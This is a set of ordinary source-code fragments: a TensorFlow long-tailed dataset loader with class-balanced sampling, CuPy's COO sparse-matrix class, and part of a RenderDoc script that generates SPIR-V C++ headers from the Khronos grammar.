"class_balanced_distillation/data/iNaturalist18/train_img_per_class.npy",
"rb"))
else:
raise ValueError(f"Dataset {config.dataset} not supported.")
base_probs = img_per_class / img_per_class.sum()
target_probs = np.ones_like(img_per_class, dtype=np.float32)
target_probs = target_probs / target_probs.sum()
base_probs = tf.convert_to_tensor(
base_probs, dtype=tf.float32)
target_probs = tf.convert_to_tensor(
target_probs.astype(np.float32), dtype=tf.float32)
oversampling_fn = functools.partial(
oversample_classes,
base_probs=base_probs,
target_probs=target_probs,
)
undersampling_filter_fn = functools.partial(
undersampling_filter,
base_probs=base_probs,
target_probs=target_probs,
)
elif config.sampling == "uniform":
undersampling_filter_fn = None
oversampling_fn = None
else:
raise ValueError(f"Sampling {config.sampling} not supported.")
train_preprocess_fn = functools.partial(
train_preprocess, add_jitter=config.add_color_jitter)
train_ds = deterministic_data.create_distributed_dataset(
dataset_builder,
strategy=strategy,
global_batch_size=config.global_batch_size,
split=train_split,
num_epochs=config.num_epochs,
shuffle=True,
cache=False,
filter_fn=undersampling_filter_fn,
preprocess_fn=train_preprocess_fn,
decoders={"image": tfds.decode.SkipDecoding()},
shuffle_buffer_size=config.shuffle_buffer_size,
prefetch_size=8,
rng=data_rng,
oversampling_fn=oversampling_fn)
eval_preprocess_fn = functools.partial(
eval_preprocess)
if config.dataset != "inaturalist18":
test_num_batches = int(
np.ceil(dataset_builder.info.splits["test"].num_examples /
(config.global_batch_size))) * strategy.num_replicas_in_sync
test_ds = deterministic_data.create_distributed_dataset(
dataset_builder,
strategy=strategy,
global_batch_size=config.global_batch_size,
split=test_split,
num_epochs=1,
shuffle=False,
cache=True,
preprocess_fn=eval_preprocess_fn,
pad_up_to_batches=test_num_batches)
val_num_batches = int(
np.ceil(dataset_builder.info.splits["validation"].num_examples /
(config.global_batch_size))) * strategy.num_replicas_in_sync
val_ds = deterministic_data.create_distributed_dataset(
dataset_builder,
strategy=strategy,
global_batch_size=config.global_batch_size,
split=val_split,
num_epochs=1,
shuffle=False,
cache=True,
preprocess_fn=eval_preprocess_fn,
pad_up_to_batches=val_num_batches)
if config.dataset == "inaturalist18":
test_ds = val_ds
return dataset_builder.info, train_ds, val_ds, test_ds
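# A hypothetical usage sketch (the config fields and PRNGKey source are
# assumptions; deterministic_data follows CLU conventions, so data_rng is
# typically a jax.random.PRNGKey):
#
#   config = ml_collections.ConfigDict(dict(
#       dataset="imagenet-lt", sampling="class_balanced",
#       global_batch_size=256, num_epochs=90,
#       shuffle_buffer_size=10000, add_color_jitter=True))
#   strategy = tf.distribute.get_strategy()
#   info, train_ds, val_ds, test_ds = create_datasets(
#       config, data_rng, strategy=strategy)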
|
|
import numpy
try:
import scipy.sparse
_scipy_available = True
except ImportError:
_scipy_available = False
import cupy
from cupy import _core
from cupy import cusparse
from cupyx.scipy.sparse import _base
from cupyx.scipy.sparse import _csc
from cupyx.scipy.sparse import _csr
from cupyx.scipy.sparse import _data as sparse_data
from cupyx.scipy.sparse import _util
from cupyx.scipy.sparse import _sputils
class coo_matrix(sparse_data._data_matrix):
"""COOrdinate format sparse matrix.
This can be instantiated in several ways.
``coo_matrix(D)``
``D`` is a rank-2 :class:`cupy.ndarray`.
``coo_matrix(S)``
``S`` is another sparse matrix. It is equivalent to ``S.tocoo()``.
``coo_matrix((M, N), [dtype])``
It constructs an empty matrix whose shape is ``(M, N)``. Default dtype
is float64.
``coo_matrix((data, (row, col)))``
All ``data``, ``row`` and ``col`` are one-dimensional
:class:`cupy.ndarray`.
Args:
arg1: Arguments for the initializer.
shape (tuple): Shape of a matrix. Its length must be two.
dtype: Data type. It must be an argument of :class:`numpy.dtype`.
copy (bool): If ``True``, copies of given data are always used.
.. seealso::
:class:`scipy.sparse.coo_matrix`
"""
format = 'coo'
_sum_duplicates_diff = _core.ElementwiseKernel(
'raw T row, raw T col',
'T diff',
'''
T diff_out = 1;
if (i == 0 || row[i - 1] == row[i] && col[i - 1] == col[i]) {
diff_out = 0;
}
diff = diff_out;
''', 'cupyx_scipy_sparse_coo_sum_duplicates_diff')
def __init__(self, arg1, shape=None, dtype=None, copy=False):
if shape is not None and len(shape) != 2:
raise ValueError(
'Only two-dimensional sparse arrays are supported.')
if _base.issparse(arg1):
x = arg1.asformat(self.format)
data = x.data
row = x.row
col = x.col
if arg1.format != self.format:
# When formats are different, all arrays are already copied
copy = False
if shape is None:
shape = arg1.shape
self.has_canonical_format = x.has_canonical_format
elif _util.isshape(arg1):
m, n = arg1
m, n = int(m), int(n)
data = cupy.zeros(0, dtype if dtype else 'd')
row = cupy.zeros(0, dtype='i')
col = cupy.zeros(0, dtype='i')
# the shape and copy arguments are ignored here
shape = (m, n)
copy = False
self.has_canonical_format = True
elif _scipy_available and scipy.sparse.issparse(arg1):
# Convert scipy.sparse to cupyx.scipy.sparse
x = arg1.tocoo()
data = cupy.array(x.data)
row = cupy.array(x.row, dtype='i')
col = cupy.array(x.col, dtype='i')
copy = False
if shape is None:
shape = arg1.shape
self.has_canonical_format = x.has_canonical_format
elif isinstance(arg1, tuple) and len(arg1) == 2:
try:
data, (row, col) = arg1
except (TypeError, ValueError):
raise TypeError('invalid input format')
if not (_base.isdense(data) and data.ndim == 1 and
_base.isdense(row) and row.ndim == 1 and
_base.isdense(col) and col.ndim == 1):
raise ValueError('row, column, and data arrays must be 1-D')
if not (len(data) == len(row) == len(col)):
raise ValueError(
'row, column, and data array must all be the same length')
self.has_canonical_format = False
elif _base.isdense(arg1):
if arg1.ndim > 2:
raise TypeError('expected dimension <= 2 array or matrix')
dense = cupy.atleast_2d(arg1)
row, col = dense.nonzero()
data = dense[row, col]
shape = dense.shape
self.has_canonical_format = True
else:
raise TypeError('invalid input format')
if dtype is None:
dtype = data.dtype
else:
dtype = numpy.dtype(dtype)
if dtype != 'f' and dtype != 'd' and dtype != 'F' and dtype != 'D':
raise ValueError(
'Only float32, float64, complex64 and complex128'
' are supported')
data = data.astype(dtype, copy=copy)
row = row.astype('i', copy=copy)
col = col.astype('i', copy=copy)
if shape is None:
if len(row) == 0 or len(col) == 0:
raise ValueError(
'cannot infer dimensions from zero sized index arrays')
shape = (int(row.max()) + 1, int(col.max()) + 1)
if len(data) > 0:
if row.max() >= shape[0]:
raise ValueError('row index exceeds matrix dimensions')
if col.max() >= shape[1]:
raise ValueError('column index exceeds matrix dimensions')
if row.min() < 0:
raise ValueError('negative row index found')
if col.min() < 0:
raise ValueError('negative column index found')
sparse_data._data_matrix.__init__(self, data)
self.row = row
self.col = col
if not _util.isshape(shape):
raise ValueError('invalid shape (must be a 2-tuple of int)')
self._shape = int(shape[0]), int(shape[1])
def _with_data(self, data, copy=True):
"""Returns a matrix with the same sparsity structure as self,
but with different data. By default the index arrays
(i.e. .row and .col) are copied.
"""
if copy:
return coo_matrix(
(data, (self.row.copy(), self.col.copy())),
shape=self.shape, dtype=data.dtype)
else:
return coo_matrix(
(data, (self.row, self.col)), shape=self.shape,
dtype=data.dtype)
def diagonal(self, k=0):
"""Returns the k-th diagonal of the matrix.
Args:
k (int, optional): Which diagonal to get, corresponding to elements
a[i, i+k]. Default: 0 (the main diagonal).
Returns:
cupy.ndarray : The k-th diagonal.
"""
rows, cols = self.shape
if k <= -rows or k >= cols:
return cupy.empty(0, dtype=self.data.dtype)
diag = cupy.zeros(min(rows + min(k, 0), cols - max(k, 0)),
dtype=self.dtype)
diag_mask = (self.row + k) == self.col
if self.has_canonical_format:
row = self.row[diag_mask]
data = self.data[diag_mask]
else:
diag_coo = coo_matrix((self.data[diag_mask],
(self.row[diag_mask], self.col[diag_mask])),
shape=self.shape)
diag_coo.sum_duplicates()
row = diag_coo.row
data = diag_coo.data
diag[row + min(k, 0)] = data
return diag
def setdiag(self, values, k=0):
"""Set diagonal or off-diagonal elements of the array.
Args:
values (ndarray): New values of the diagonal elements. Values may
have any length. If the diagonal is longer than values, then
the remaining diagonal entries will not be set. If values are
longer than the diagonal, then the remaining values are
ignored. If a scalar value is given, all of the diagonal is set
to it.
k (int, optional): Which off-diagonal to set, corresponding to
elements a[i,i+k]. Default: 0 (the main diagonal).
"""
M, N = self.shape
if (k > 0 and k >= N) or (k < 0 and -k >= M):
raise ValueError("k exceeds matrix dimensions")
if values.ndim and not len(values):
return
idx_dtype = self.row.dtype
# Determine which triples to keep and where to put the new ones.
full_keep = self.col - self.row != k
if k < 0:
max_index = min(M + k, N)
if values.ndim:
max_index = min(max_index, len(values))
keep = cupy.logical_or(full_keep, self.col >= max_index)
new_row = cupy.arange(-k, -k + max_index, dtype=idx_dtype)
new_col = cupy.arange(max_index, dtype=idx_dtype)
else:
max_index = min(M, N - k)
if values.ndim:
max_index = min(max_index, len(values))
keep = cupy.logical_or(full_keep, self.row >= max_index)
new_row = cupy.arange(max_index, dtype=idx_dtype)
new_col = cupy.arange(k, k + max_index, dtype=idx_dtype)
# Define the array of data consisting of the entries to be added.
if values.ndim:
new_data = values[:max_index]
else:
new_data = cupy.empty(max_index, dtype=self.dtype)
new_data[:] = values
# Update the internal structure.
self.row = cupy.concatenate((self.row[keep], new_row))
self.col = cupy.concatenate((self.col[keep], new_col))
self.data = cupy.concatenate((self.data[keep], new_data))
self.has_canonical_format = False
def eliminate_zeros(self):
"""Removes zero entories in place."""
ind = self.data != 0
self.data = self.data[ind]
self.row = self.row[ind]
self.col = self.col[ind]
def get_shape(self):
"""Returns the shape of the matrix.
Returns:
tuple: Shape of the matrix.
"""
return self._shape
def getnnz(self, axis=None):
"""Returns the number of stored values, including explicit zeros."""
if axis is None:
return self.data.size
else:
raise ValueError
def get(self, stream=None):
"""Returns a copy of the array on host memory.
Args:
stream (cupy.cuda.Stream): CUDA stream object. If it is given, the
copy runs asynchronously. Otherwise, the copy is synchronous.
Returns:
scipy.sparse.coo_matrix: Copy of the array on host memory.
"""
if not _scipy_available:
raise RuntimeError('scipy is not available')
data = self.data.get(stream)
row = self.row.get(stream)
col = self.col.get(stream)
return scipy.sparse.coo_matrix(
(data, (row, col)), shape=self.shape)
def reshape(self, *shape, order='C'):
"""Gives a new shape to a sparse matrix without changing its data.
Args:
shape (tuple):
The new shape should be compatible with the original shape.
order: {'C', 'F'} (optional)
Read the elements using this index order. 'C' means to read and
write the elements using C-like index order. 'F' means to read
and write the elements using Fortran-like index order. Default:
C.
Returns:
cupyx.scipy.sparse.coo_matrix: sparse matrix
"""
shape = _sputils.check_shape(shape, self.shape)
if shape == self.shape:
return self
nrows, ncols = self.shape
if order == 'C': # C to represent matrix in row major format
dtype = _sputils.get_index_dtype(
maxval=(ncols * max(0, nrows - 1) + max(0, ncols - 1)))
flat_indices = cupy.multiply(ncols, self.row,
dtype=dtype) + self.col
new_row, new_col = divmod(flat_indices, shape[1])
elif order == 'F':
dtype = _sputils.get_index_dtype(
maxval=(nrows * max(0, ncols - 1) + max(0, nrows - 1)))
flat_indices = cupy.multiply(nrows, self.col,
dtype=dtype) + self.row
new_col, new_row = divmod(flat_indices, shape[0])
else:
raise ValueError("'order' must be 'C' or 'F'")
new_data = self.data
return coo_matrix((new_data, (new_row, new_col)), shape=shape,
copy=False)
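# A small illustrative sketch (hypothetical values): in C order the entry at
# (0, 2) of a 2x3 matrix has flat index 0*3 + 2 = 2, so after reshaping to
# (3, 2) it lands at divmod(2, 2) == (1, 0).
#
#   m = coo_matrix((cupy.array([1.], 'f'),
#                   (cupy.array([0], 'i'), cupy.array([2], 'i'))),
#                  shape=(2, 3))
#   m2 = m.reshape(3, 2)   # the entry moves to row 1, col 0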
def sum_duplicates(self):
"""Eliminate duplicate matrix entries by adding them together.
.. warning::
When sorting the indices, CuPy follows the convention of cuSPARSE,
which is different from that of SciPy. Therefore, the order of the
output indices may differ:
.. code-block:: python
>>> # 1 0 0
>>> # A = 1 1 0
>>> # 1 1 1
>>> data = cupy.array([1, 1, 1, 1, 1, 1], 'f')
>>> row = cupy.array([0, 1, 1, 2, 2, 2], 'i')
>>> col = cupy.array([0, 0, 1, 0, 1, 2], 'i')
>>> A = cupyx.scipy.sparse.coo_matrix((data, (row, col)),
... shape=(3, 3))
>>> a = A.get()
>>> A.sum_duplicates()
>>> a.sum_duplicates() # a is scipy.sparse.coo_matrix
>>> A.row
array([0, 1, 1, 2, 2, 2], dtype=int32)
>>> a.row
array([0, 1, 2, 1, 2, 2], dtype=int32)
>>> A.col
array([0, 0, 1, 0, 1, 2], dtype=int32)
>>> a.col
array([0, 0, 0, 1, 1, 2], dtype=int32)
.. warning::
Calling this function might synchronize the device.
.. seealso::
:meth:`scipy.sparse.coo_matrix.sum_duplicates`
"""
if self.has_canonical_format:
return
# Note: The sorting order below follows the cuSPARSE convention (first
# row then col, so-called row-major) and differs from that of SciPy, as
# the cuSPARSE functions such as cusparseSpMV() assume this sorting
# order.
# See https://docs.nvidia.com/cuda/cusparse/index.html#coo-format
keys = cupy.stack([self.col, self.row])
order = cupy.lexsort(keys)
src_data = self.data[order]
src_row = self.row[order]
src_col = self.col[order]
diff = self._sum_duplicates_diff(src_row, src_col, size=self.row.size)
if diff[1:].all():
# All elements have different indices.
data = src_data
row = src_row
col = src_col
else:
# TODO(leofang): move the kernels outside this method
index = cupy.cumsum(diff, dtype='i')
size = int(index[-1]) + 1
data = cupy.zeros(size, dtype=self.data.dtype)
row = cupy.empty(size, dtype='i')
col = cupy.empty(size, dtype='i')
if self.data.dtype.kind == 'f':
cupy.ElementwiseKernel(
'T src_data, int32 src_row, int32 src_col, int32 index',
'raw T data, raw int32 row, raw int32 col',
'''
atomicAdd(&data[index], src_data);
row[index] = src_row;
col[index] = src_col;
''',
'cupyx_scipy_sparse_coo_sum_duplicates_assign'
)(src_data, src_row, src_col, index, data, row, col)
elif self.data.dtype.kind == 'c':
cupy.ElementwiseKernel(
'T src_real, T src_imag, int32 src_row, int32 src_col, '
'int32 index',
'raw T real, raw T imag, raw int32 row, raw int32 col',
'''
atomicAdd(&real[index], src_real);
atomicAdd(&imag[index], src_imag);
row[index] = src_row;
col[index] = src_col;
''',
'cupyx_scipy_sparse_coo_sum_duplicates_assign_complex'
)(src_data.real, src_data.imag, src_row, src_col, index,
data.real, data.imag, row, col)
self.data = data
self.row = row
self.col = col
self.has_canonical_format = True
def toarray(self, order=None, out=None):
"""Returns a dense matrix representing the same value.
Args:
order (str): Not supported.
out: Not supported.
Returns:
cupy.ndarray: Dense array representing the same value.
.. seealso:: :meth:`scipy.sparse.coo_matrix.toarray`
"""
return self.tocsr().toarray(order=order, out=out)
def tocoo(self, copy=False):
"""Converts the matrix to COOdinate format.
Args:
copy (bool): If ``False``, it shares data arrays as much as
possible.
Returns:
cupyx.scipy.sparse.coo_matrix: Converted matrix.
"""
if copy:
return self.copy()
else:
return self
def tocsc(self, copy=False):
"""Converts the matrix to Compressed Sparse Column format.
Args:
copy (bool): If ``False``, it shares data arrays as much as
possible. Actually this option is ignored because all
arrays in a matrix cannot be shared in coo to csc conversion.
Returns:
cupyx.scipy.sparse.csc_matrix: Converted matrix.
"""
if self.nnz == 0:
return _csc.csc_matrix(self.shape, dtype=self.dtype)
# copy is silently ignored (in line with SciPy) because both
# sum_duplicates and coosort change the underlying data
x = self.copy()
x.sum_duplicates()
cusparse.coosort(x, 'c')
x = cusparse.coo2csc(x)
x.has_canonical_format = True
return x
def tocsr(self, copy=False):
"""Converts the matrix to Compressed Sparse Row format.
Args:
copy (bool): If ``False``, it shares data arrays as much as
possible. Actually this option is ignored because all
arrays in a matrix cannot be shared in coo to csr conversion.
Returns:
cupyx.scipy.sparse.csr_matrix: Converted matrix.
"""
if self.nnz == 0:
return _csr.csr_matrix(self.shape, dtype=self.dtype)
# copy is silently ignored (in line with SciPy) because both
# sum_duplicates and coosort change the underlying data
x = self.copy()
x.sum_duplicates()
cusparse.coosort(x, 'r')
x = cusparse.coo2csr(x)
x.has_canonical_format = True
return x
def transpose(self, axes=None, copy=False):
"""Returns a transpose matrix.
Args:
axes: This option is not supported.
copy (bool): If ``True``, a returned matrix shares no data.
Otherwise, it shares data arrays as much as possible.
Returns:
cupyx.scipy.sparse.spmatrix: Transpose matrix.
"""
if axes is not None:
raise ValueError(
'Sparse matrices do not support an \'axes\' parameter because '
'swapping dimensions is the only logical permutation.')
shape = self.shape[1], self.shape[0]
return coo_matrix(
(self.data, (self.col, self.row)), shape=shape, copy=copy)
def isspmatrix_coo(x):
"""Checks if a given matrix is of COO format.
Returns:
bool: Returns if ``x`` is :class:`cupyx.scipy.sparse.coo_matrix`.
"""
return isinstance(x, coo_matrix)
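# A minimal usage sketch (hypothetical data): build a COO matrix from
# triplets, merge duplicate coordinates, then convert to CSR.
#
#   data = cupy.array([1., 2., 3.], dtype='f')
#   row = cupy.array([0, 0, 1], dtype='i')
#   col = cupy.array([1, 1, 0], dtype='i')
#   m = coo_matrix((data, (row, col)), shape=(2, 2))
#   m.sum_duplicates()   # the two (0, 1) entries merge into 3.0
#   csr = m.tocsr()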
|
|
#!/usr/bin/env python3
import os
import io
import sys
import re
import argparse
import json
import xml.etree.ElementTree as ET
# on msys, use crlf output
nl = None
if sys.platform == 'msys':
nl = "\r\n"
# Get the file, relative to this script's location (same directory)
# that way we're not sensitive to CWD
pathname = os.path.abspath(os.path.dirname(sys.argv[0])) + os.path.sep
with open(pathname + 'spirv.core.grammar.json', mode='r') as f:
spirv = json.load(f)
with open(pathname + 'extinst.glsl.std.450.grammar.json', mode='r') as f:
glsl450 = json.load(f)
# open XML registry
registry = ET.parse(pathname + 'spir-v.xml').getroot()
# open the file for write
header = open(pathname + 'spirv_gen.h', mode='w', newline = nl)
ops_header = open(pathname + 'spirv_op_helpers.h', mode='w', newline = nl)
cpp = open(pathname + 'spirv_gen.cpp', mode='w', newline = nl)
###############################################################################
##
## Headers
##
###############################################################################
def prefix_star(line):
if line == '':
return ' *'
else:
return ' * ' + line
def operand_name(name, lowercase_first = True):
name = name.replace('\n', ' ')
# special case a few very awkward names
if re.search(r'member [0-9].*\.\.\.', name, re.RegexFlag.I):
return 'members'
if re.search(r'parameter [0-9].*\.\.\.', name, re.RegexFlag.I):
return 'parameters'
if re.search(r'argument [0-9].*\.\.\.', name, re.RegexFlag.I):
return 'arguments'
if re.search(r'variable, parent.*\.\.\.', name, re.RegexFlag.I):
return 'parents'
name = re.sub(r'<<(.*),(.*)>>', r'\2', name)
name = re.sub(r'[ \'~<>./-]', '', name)
if name.lower() == 'interface':
return 'iface'
if name.lower() == 'default':
return 'def'
if lowercase_first:
return name[0].lower() + name[1:]
else:
return name
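# For example: operand_name('Entry Point') -> 'entryPoint',
# operand_name('Interface') -> 'iface', operand_name('Default') -> 'def', and
# a name like 'Member 0 type, member 1 type, ...' collapses to 'members'.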
copyright = '''
/******************************************************************************
* The MIT License (MIT)
*
* Copyright (c) 2019-2021 Baldur Karlsson
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
******************************************************************************/
/******************************************************************************
* Generated from Khronos SPIR-V machine-readable JSON grammar.
*
{}
******************************************************************************/
'''.format("\n".join([prefix_star(line.strip()) for line in spirv['copyright']])).strip()
header.write('''{copyright}
#pragma once
// This file is autogenerated with gen_spirv_code.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_spirv_code.py
// We need to disable clang-format since this file is programmatically generated
// clang-format off
#include <stdint.h>
#include "api/replay/apidefs.h"
#include "api/replay/stringise.h"
#undef None
#undef CopyMemory
#undef MemoryBarrier
namespace rdcspv
{{
static const uint32_t MagicNumber = {magic};
static const uint32_t VersionMajor = {major};
static const uint32_t VersionMinor = {minor};
static const uint32_t VersionRevision = {revision};
static const uint32_t VersionPacked = ({major} << 16) | ({minor} << 8);
static const uint32_t OpCodeMask = 0xffff;
static const uint32_t WordCountShift = 16;
static const uint32_t FirstRealWord = 5;
struct Id
{{
constexpr inline Id() : id(0) {{}}
// only allow explicit functions to cast to/from uint32_t
constexpr static inline Id fromWord(uint32_t i) {{ return Id(i); }}
inline uint32_t value() const {{ return id; }}
constexpr inline explicit operator bool() const {{ return id != 0; }}
constexpr inline bool operator==(const Id o) const {{ return id == o.id; }}
constexpr inline bool operator!=(const Id o) const {{ return id != o.id; }}
constexpr inline bool operator<(const Id o) const {{ return id < o.id; }}
constexpr inline bool operator==(const uint32_t o) const {{ return id == o; }}
constexpr inline bool operator!=(const uint32_t o) const {{ return id != o; }}
constexpr inline bool operator<(const uint32_t o) const {{ return id < o; }}
private:
constexpr inline Id(uint32_t i) : id(i) {{}}
uint32_t id;
}};
enum class Generator : uint32_t
{{'''.format(copyright = copyright, magic = spirv['magic_number'], major = spirv['major_version'], minor = spirv['minor_version'], revision = spirv['revision']))
generator_tostr = ''
for gen in registry.findall('ids[@type=\'vendor\']/id[@tool]'):
name = operand_name(gen.attrib['tool'], lowercase_first=False)
tostr = '{} from {} - {}'.format(gen.attrib['tool'], gen.attrib['vendor'], gen.attrib['comment'])
generator_tostr += ' STRINGISE_ENUM_CLASS_NAMED({}, "{}");\n'.format(name, tostr.replace('"', '\\"').replace('\\', '\\\\'))
header.write('\n {} = {},'.format(name, gen.attrib['value']))
header.write('\n};\n\n')
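# As a rough illustration (assuming the registry's Glslang entry has value 8),
# the loop above would emit an enum entry like:
#   GlslangReferenceFrontEnd = 8,
# along with a matching STRINGISE_ENUM_CLASS_NAMED line in generator_tostr.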
ops_header.write('''{copyright}
#pragma once
// This file is autogenerated with gen_spirv_code.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_spirv_code.py
// We need to disable clang-format since this file is programmatically generated
// clang-format off
#include <functional>
#include <set>
#include <stdint.h>
#include "api/replay/apidefs.h"
#include "api/replay/rdcstr.h"
#include "api/replay/rdcarray.h"
#include "api/replay/stringise.h"
#undef None
#undef CopyMemory
#undef MemoryBarrier
#include "spirv_common.h"
#include "spirv_gen.h"
namespace rdcspv
{{
template<typename Type>
Type DecodeParam(const ConstIter &it, uint32_t &word);
template<>
inline uint32_t DecodeParam(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return 0;
uint32_t ret = it.word(word);
word += 1;
return ret;
}}
template<>
inline Id DecodeParam<Id>(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return Id();
Id ret = Id::fromWord(it.word(word));
word += 1;
return ret;
}}
template<>
inline rdcstr DecodeParam<rdcstr>(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return "";
rdcstr ret = (const char *)&it.word(word);
word += uint32_t(ret.size() / 4) + 1;
return ret;
}}
template<typename Type>
rdcarray<Type> MultiParam(const ConstIter &it, uint32_t &word)
{{
rdcarray<Type> ret;
while(word < it.size())
{{
Type t = DecodeParam<Type>(it, word);
ret.push_back(t);
}}
return ret;
}}
inline void EncodeParam(rdcarray<uint32_t> &words, const rdcstr &str)
{{
size_t i=0, remainingChars = str.size() + 1;
while(remainingChars > 0)
{{
uint32_t word = 0;
for(size_t w=0; w < remainingChars && w < 4; w++)
word |= uint32_t(str[i+w]) << (w*8);
words.push_back(word);
i += 4;
if(remainingChars < 4)
remainingChars = 0;
else
remainingChars -= 4;
}}
}}
'''.format(copyright = copyright))
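# The generated EncodeParam above packs the string plus its NUL terminator
# little-endian, four bytes per 32-bit word, matching SPIR-V's literal string
# encoding; DecodeParam<rdcstr> mirrors this by advancing size()/4 + 1 words.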
cpp.write('''{copyright}
// This file is autogenerated with gen_spirv_code.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_spirv_code.py
// We need to disable clang-format since this file is programmatically generated
// clang-format off
#include "spirv_gen.h"
#include "os/os_specific.h"
#include "common/formatting.h"
#include "spirv_op_helpers.h"
'''.format(copyright = copyright))
###############################################################################
##
## Operands (declare enums, stringise, preprocess)
##
###############################################################################
positional_names = [ 'first', 'second', 'third' ]
kinds = {}
for operand_kind in spirv['operand_kinds']:
name = operand_kind['kind']
if 'enumerants' in operand_kind:
operand_kind['has_params'] = any(['parameters' in value for value in operand_kind['enumerants']])
else:
operand_kind['has_params'] = False
kinds[name] = operand_kind
operand_kind['push_words'] = lambda name: 'words.push_back((uint32_t){});'.format(name)
operand_kind['from_words'] = None
operand_kind['is_id'] = False
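    # push_words/from_words are per-kind emitters that return C++ snippets to
    # encode an operand into the word stream and decode it back out; the
    # branches below override them where a plain uint32_t cast isn't enough.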
if operand_kind['category'] == 'ValueEnum':
operand_kind['size'] = 1
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = name + '::Invalid'
operand_kind['type'] = name
decl = ''
stringise = ''
used = []
for value in operand_kind['enumerants']:
value_name = value['enumerant']
if value_name[0].isdigit():
value_name = '_' + value_name
decl += ' {} = {},\n'.format(value_name, value['value'])
if value['value'] in used:
continue
used.append(value['value'])
if value_name != value['enumerant']:
stringise += ' STRINGISE_ENUM_CLASS_NAMED({}, "{}");\n'.format(value_name, value['enumerant'])
else:
stringise += ' STRINGISE_ENUM_CLASS({});\n'.format(value_name)
header.write('''enum class {name} : uint32_t
{{
{values}
Max,
Invalid = ~0U,
}};
'''.format(name = name, values = decl.rstrip()))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::{name} &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::{name});
{{
{values}
}}
END_ENUM_STRINGISE();
}}
'''.format(name = name, values = stringise.rstrip()))
elif operand_kind['category'] == 'BitEnum':
operand_kind['size'] = 1
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = name + '::None'
operand_kind['type'] = name
used = []
decl = ''
stringise = ''
for value in operand_kind['enumerants']:
decl += ' {} = {},\n'.format(value['enumerant'], value['value'])
if value['value'] in used:
continue
used.append(value['value'])
if value['enumerant'] == 'None':
stringise += ' STRINGISE_BITFIELD_CLASS_VALUE(None);\n\n'
else:
stringise += ' STRINGISE_BITFIELD_CLASS_BIT({});\n'.format(value['enumerant'])
header.write('''enum class {name} : uint32_t
{{
{values}
Max,
Invalid = ~0U,
}};
BITMASK_OPERATORS({name});
'''.format(name = name, values = decl.rstrip()))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::{name} &el)
{{
BEGIN_BITFIELD_STRINGISE(rdcspv::{name});
{{
{values}
}}
END_BITFIELD_STRINGISE();
}}
'''.format(name = name, values = stringise.rstrip()))
    # Special operand types whose behaviour we hardcode
elif (operand_kind['kind'] == 'IdRef'):
operand_kind['size'] = 1
operand_kind['def_name'] = 'id'
operand_kind['def_value'] = 'Id()'
operand_kind['type'] = 'Id'
operand_kind['is_id'] = True
operand_kind['push_words'] = lambda name: 'words.push_back({}.value());'.format(name)
operand_kind['from_words'] = lambda name: 'Id::fromWord({})'.format(name)
elif (operand_kind['kind'] == 'IdResultType' or
operand_kind['kind'] == 'IdResult' or
operand_kind['kind'] == 'IdMemorySemantics' or
operand_kind['kind'] == 'IdScope'):
operand_kind['size'] = 1
operand_kind['type'] = name
operand_kind['is_id'] = True
operand_kind['def_name'] = name[2].lower() + name[3:]
operand_kind['def_value'] = name + '()'
operand_kind['push_words'] = lambda name: 'words.push_back({}.value());'.format(name)
operand_kind['from_words'] = lambda name: 'Id::fromWord({})'.format(name)
header.write('using {} = Id;\n\n'.format(name))
# For simplicity, assume literal integers are 32-bit in size
elif (operand_kind['kind'] == 'LiteralInteger'):
operand_kind['size'] = 1
operand_kind['def_name'] = 'num'
operand_kind['def_value'] = '0'
operand_kind['type'] = 'uint32_t'
elif (operand_kind['kind'] == 'LiteralString'):
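        # Large negative sentinel: a string's word count is variable, so any
        # sum of operand sizes that includes one stays negative, forcing the
        # variable-size (MinWordSize) handling in the instruction loop below.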
operand_kind['size'] = -1000000
operand_kind['type'] = 'rdcstr'
operand_kind['def_name'] = 'str'
operand_kind['def_value'] = '""'
operand_kind['push_words'] = lambda name: 'EncodeParam(words, {});'.format(name)
operand_kind['from_words'] = lambda name: 'DecodeParam({})'.format(name)
elif (operand_kind['kind'] == 'LiteralContextDependentNumber' or
operand_kind['kind'] == 'LiteralExtInstInteger' or
operand_kind['kind'] == 'LiteralSpecConstantOpInteger'):
operand_kind['size'] = None
elif (operand_kind['kind'] == 'PairLiteralIntegerIdRef'):
operand_kind['size'] = 2
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = '{0, Id()}'
operand_kind['type'] = name
operand_kind['push_words'] = lambda name: 'words.push_back((uint32_t){0}.first); words.push_back({0}.second.value());'.format(name)
ops_header.write('struct {} {{ uint32_t first; Id second; }};\n\n'.format(name))
elif (operand_kind['kind'] == 'PairIdRefLiteralInteger'):
operand_kind['size'] = 2
operand_kind['def_name'] = name[0].lower() + name[1:]
operand_kind['def_value'] = '{Id(), 0}'
operand_kind['type'] = name
operand_kind['push_words'] = lambda name: 'words.push_back({0}.first.value()); words.push_back((uint32_t){0}.second);'.format(name)
ops_header.write('struct {} {{ Id first; uint32_t second; }};\n\n'.format(name))
elif (operand_kind['kind'] == 'PairIdRefIdRef'):
operand_kind['size'] = 2
operand_kind['def_name'] = name[0].lower() + name[1:]
